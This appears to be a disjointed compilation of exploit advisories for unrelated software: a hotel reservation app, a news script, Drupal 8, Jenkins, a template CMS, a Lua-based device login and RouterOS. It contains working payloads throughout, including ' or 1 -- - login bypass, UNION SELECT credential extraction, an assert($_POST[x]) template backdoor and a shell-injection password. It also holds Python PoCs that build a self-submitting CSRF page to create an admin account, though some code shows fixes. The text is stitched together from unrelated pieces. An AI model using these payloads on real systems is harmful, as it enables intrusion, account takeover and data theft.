A Cross-Site Request Forgery (CSRF) vulnerability exists in Simple Online Hotel Reservation System that lets an attacker create an admin account without knowing any credentials. The add_account.php page has no CSRF protection (no anti-CSRF token is issued or checked), so an attacker can host a malicious HTML page that silently submits the add-account request; when a logged-in administrator visits that page, the browser attaches the admin's session cookie and the account is created. This can be exploited to gain administrative access to the application.
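The attack page described above, together with the per-session token check that add_account.php lacks, as an added example. This is not code from Simple Online Hotel Reservation System; the endpoint path under [PATH], the form field names (username, password, type) and the csrf_token parameter are assumptions.

```python
"""CSRF against an unprotected add-account endpoint, and the check that stops it.

Added example, not code from Simple Online Hotel Reservation System. The
request shape (POST fields username/password/type) and the csrf_token field
name are assumptions.
"""
import hashlib
import hmac
import secrets
from html import escape

# Assumed (hypothetical) shape of the add-account request.
TARGET = "http://localhost/[PATH]/admin/add_account.php"
FORGED_FIELDS = {"username": "backdoor", "password": "Passw0rd!", "type": "admin"}


def csrf_poc_page(action_url: str, fields: dict) -> str:
    """Build the attacker-hosted page: a hidden form that submits itself on load.

    The victim's browser sends the admin's session cookie with the POST, so the
    request looks authenticated to add_account.php.
    """
    inputs = "\n".join(
        f'    <input type="hidden" name="{escape(k)}" value="{escape(v)}">'
        for k, v in fields.items()
    )
    return (
        '<html><body onload="document.forms[0].submit()">\n'
        f'  <form method="POST" action="{escape(action_url)}">\n'
        f"{inputs}\n"
        "  </form>\n"
        "</body></html>\n"
    )


# --- the missing protection: an anti-CSRF token bound to the session ------

def issue_csrf_token(session_id: str, server_key: bytes) -> str:
    """Token tied to the admin's session; rendered only into the legitimate form."""
    return hmac.new(server_key, session_id.encode(), hashlib.sha256).hexdigest()


def add_account_handler(session_id: str, server_key: bytes, form: dict) -> bool:
    """Return True if the account would be created.

    A forged form cannot carry a valid token: the attacker's page cannot read
    the admin's form (same-origin policy) and cannot compute the HMAC without
    the server key.
    """
    expected = issue_csrf_token(session_id, server_key)
    submitted = form.get("csrf_token", "")
    if not hmac.compare_digest(expected, submitted):
        return False  # cross-site request: reject before touching the database
    return all(form.get(k) for k in ("username", "password", "type"))


if __name__ == "__main__":
    print(csrf_poc_page(TARGET, FORGED_FIELDS))
    key = secrets.token_bytes(32)
    sid = "admin-session-123"
    print("forged request accepted:", add_account_handler(sid, key, FORGED_FIELDS))
    legit = dict(FORGED_FIELDS, csrf_token=issue_csrf_token(sid, key))
    print("token-bearing request accepted:", add_account_handler(sid, key, legit))
```

The same check applies to every state-changing admin page, not only add_account.php; a token that is valid for one session must also be rejected for any other session, which is why the token is keyed on the session id.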
Authentication bypass: go to the admin login page (http://localhost/[PATH]/admin/index.php) and submit the payload below as both the username and the password:
    Username: ' or 1 -- -
    Password: ' or 1 -- -
SQL injection in the room_id parameter of edit_room.php:
    http://localhost/[PATH]/admin/edit_room.php?room_id=4
    http://localhost/[PATH]/admin/edit_room.php?room_id=-4%27union%20select%201,2,3,4%20--%20-
The second URL closes the string literal, uses a room id that matches no row so the original query returns nothing, and appends a four-column UNION SELECT whose values are displayed where the room's details would normally appear; replacing the numbered placeholders with column names or functions reads data from other tables.
This exploit is a proof of concept for a remote code execution vulnerability in Drupal 8.6.9 and earlier versions (Drupal SA-CORE-2019-003). It allows an unauthenticated attacker to execute arbitrary code on the target system by sending a request to the REST services module that carries a serialized PHP object, which the application later unserializes. Technical details for this exploit are available at https://www.drupal.org/sa-core-2019-003, https://www.ambionics.io/blog/drupal8-rce, and https://twitter.com/jcran/status/1099206271901798400.
An SQL injection vulnerability exists in News Website Script 2.0.5: user input is concatenated into a database query without sanitisation or parameterisation, so an attacker can inject SQL into the query the application runs. This can be exploited to read sensitive information stored in the database, such as user credentials, or to modify the stored data.
An attacker can exploit this vulnerability by sending a malicious payload in the 's' parameter of the URL. For cross-site scripting, the payload can be a <script> tag that calls alert(); for SQL injection, the payload can be a query fragment that makes the database return its version string.
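Both injections on this page, the admin login bypass with ' or 1 -- - and the UNION SELECT through a numeric id parameter (the room_id case above, and the version-extraction case for the 's' parameter), replayed against an in-memory SQLite database as an added example. This is not code from Simple Online Hotel Reservation System or News Website Script; the table layouts, the column counts and the way each application builds its query are assumptions, and SQLite stands in for a MySQL backend, so sqlite_version() plays the role of MySQL's version().

```python
"""Why the login-bypass and UNION payloads work, replayed against SQLite.

Added example, not code from either affected application. Schema, column
counts and query construction are assumptions; SQLite stands in for MySQL.
"""
import sqlite3
from urllib.parse import quote


def setup() -> sqlite3.Connection:
    """Constructed sample data: an admin table and a four-column rooms table."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE admin (id INTEGER, username TEXT, password TEXT, level TEXT);
        INSERT INTO admin VALUES (1, 'admin', 's3cret', 'superadmin');
        CREATE TABLE rooms (room_id INTEGER, name TEXT, price INTEGER, status TEXT);
        INSERT INTO rooms VALUES (4, 'Deluxe', 120, 'available');
        """
    )
    return db


def vulnerable_login(db, username: str, password: str):
    """String-concatenated login query, the pattern behind the admin login bypass."""
    sql = (
        "SELECT id, username FROM admin WHERE username='" + username
        + "' AND password='" + password + "'"
    )
    return db.execute(sql).fetchall()


def vulnerable_lookup(db, room_id: str):
    """edit_room.php?room_id=... style lookup with the value spliced into the query."""
    sql = "SELECT room_id, name, price, status FROM rooms WHERE room_id='" + room_id + "'"
    return db.execute(sql).fetchall()


def safe_login(db, username: str, password: str):
    """Parameterised version: the payload is bound as data and never parsed as SQL."""
    sql = "SELECT id, username FROM admin WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchall()


def inject_url(base: str, payload: str) -> str:
    """URL-encode a payload the way it appears in the advisory's second URL."""
    return base + quote(payload, safe=",")


# Payloads taken from the advisory text. "-- -" closes the rest of the original
# query as a comment; the trailing "-" guarantees the whitespace MySQL requires
# after "--".
LOGIN_BYPASS = "' or 1 -- -"
UNION_PROBE = "-4' union select 1,2,3,4 -- -"      # find the column count
UNION_CREDS = "-4' union select 1,username,password,4 from admin -- -"
UNION_VERSION = "-4' union select 1,sqlite_version(),3,4 -- -"  # version() on MySQL


if __name__ == "__main__":
    db = setup()
    print("bypass  :", vulnerable_login(db, LOGIN_BYPASS, LOGIN_BYPASS))
    print("safe    :", safe_login(db, LOGIN_BYPASS, LOGIN_BYPASS))
    print("probe   :", vulnerable_lookup(db, UNION_PROBE))
    print("creds   :", vulnerable_lookup(db, UNION_CREDS))
    print("version :", vulnerable_lookup(db, UNION_VERSION))
    print("url     :", inject_url("http://localhost/[PATH]/admin/edit_room.php?room_id=", UNION_PROBE))
```

The UNION_PROBE step is what the advisory's second URL does: once the probe comes back without an error and the placeholders show up in the page, the positions that are rendered are the ones to replace with column names or version().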
Because the template filtering function parserIfLabel() in inc/zzz_template.php fails to block dangerous function calls, an attacker with access to the template editor can insert dynamic PHP code into a template, which is evaluated when the template is rendered. Log in to the admin panel, edit the template search.html and insert the following code:
    {if:assert($_POST[x])}phpinfo();{end if}
Then visit http://webroot/search/ and POST the data x=phpinfo(); the page executes the PHP code phpinfo(). The condition works because assert() evaluates a string argument as PHP code on PHP 5 and PHP 7 (string evaluation was removed in PHP 8), so whatever is posted as x runs on the server.
This exploit chains CVE-2019-1003000 and CVE-2018-1999002 for pre-authentication remote code execution in Jenkins. It targets Pipeline: Declarative Plugin up to and including 1.3.4, Pipeline: Groovy Plugin up to and including 2.61, and Script Security Plugin up to and including 1.49.
An attacker can exploit the Drupal 8.6.9 vulnerability by sending a serialized PHP object as a property in a REST request. That property is later passed to unserialize(), so a gadget chain produced by a tool such as PHPGGC runs arbitrary code on the server. The attacker generates the payload with PHPGGC and sends it in a GET request.
The login form passes user input directly to a shell command without any escaping or validation. The relevant part of /usr/share/www/check.lp:
    #!/usr/bin/env cgilua.cgi
    <%
    local pass = cgilua.POST.password
    -- the submitted password is spliced into a shell command line, unescaped
    local com1 = os.execute("echo '"..cgilua.POST.password.."' | (su -c /bin/true)")
An attacker can perform command injection through the "password" parameter of the login form. An example "password" that bypasses this authentication is:
    f' > /dev/null #
The single quote closes the string given to echo, the redirect discards its output, and the # comments out the rest of the line including the su call, so the command exits successfully without the real password ever being checked. Because the injected text is interpreted by a shell, an attacker can also execute arbitrary commands directly on the server through the same parameter.
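The check.lp injection replayed in Python, as an added example that is not code from the affected device. The `su -c /bin/true` stage is replaced by a constructed stand-in (grep -qx against a fixed secret) so the script runs offline without a root password prompt; the string concatenation, the bypass payload and the "zero exit status means logged in" logic follow the snippet above. Alongside it are the two fixes a reviewer would ask for: quoting the value with shlex.quote, and dropping the shell entirely.

```python
"""The check.lp command injection with a stand-in for `su`, plus two fixes.

Added example, not code from the affected device. `(su -c /bin/true)` is
replaced by `(grep -qx SECRET)`, which likewise exits 0 only for the right
password; SECRET is a constructed value.
"""
import shlex
import subprocess

SECRET = "correct-horse"          # constructed stand-in for the real account password
CHECK = f"(grep -qx {SECRET})"    # stands in for (su -c /bin/true)


def build_vulnerable_command(password: str) -> str:
    """Same concatenation as check.lp: the password lands inside single quotes, unescaped."""
    return "echo '" + password + "' | " + CHECK


def vulnerable_login(password: str) -> bool:
    """Treats a zero exit status as a successful login, as check.lp does with os.execute."""
    res = subprocess.run(build_vulnerable_command(password), shell=True,
                         stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return res.returncode == 0


def run_as_server(password: str) -> str:
    """What the server would actually execute: returns the shell's stdout."""
    res = subprocess.run(build_vulnerable_command(password), shell=True,
                         capture_output=True, text=True)
    return res.stdout


def quoted_login(password: str) -> bool:
    """Minimal fix: shlex.quote keeps the whole password inside one shell word."""
    cmd = "echo " + shlex.quote(password) + " | " + CHECK
    res = subprocess.run(cmd, shell=True,
                         stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return res.returncode == 0


def no_shell_login(password: str) -> bool:
    """Better fix: no shell at all; the password reaches the checker over stdin as data."""
    res = subprocess.run(["grep", "-qx", SECRET], input=password + "\n", text=True,
                         stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return res.returncode == 0


# The advisory's payload: close the quote, discard echo's output, comment out the check.
BYPASS = "f' > /dev/null #"
# Arbitrary command execution through the same parameter (harmless command here).
RCE = "'; echo INJECTED #"

if __name__ == "__main__":
    print("command :", build_vulnerable_command(BYPASS))
    print("bypass  :", vulnerable_login(BYPASS))
    print("rce out :", run_as_server(RCE).strip())
    print("quoted  :", quoted_login(BYPASS))
    print("noshell :", no_shell_login(BYPASS))
```

shlex.quote is enough to stop this particular payload, but a password that is never handed to a shell cannot be misparsed by one, which is why the stdin variant is the one to ship; the real check.lp would pass the password to su the same way.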
A remote, unauthenticated attacker can proxy traffic through a RouterOS device by sending network probes via its agent binary. This PoC demonstrates using that capability to exploit a host on the LAN from the WAN side.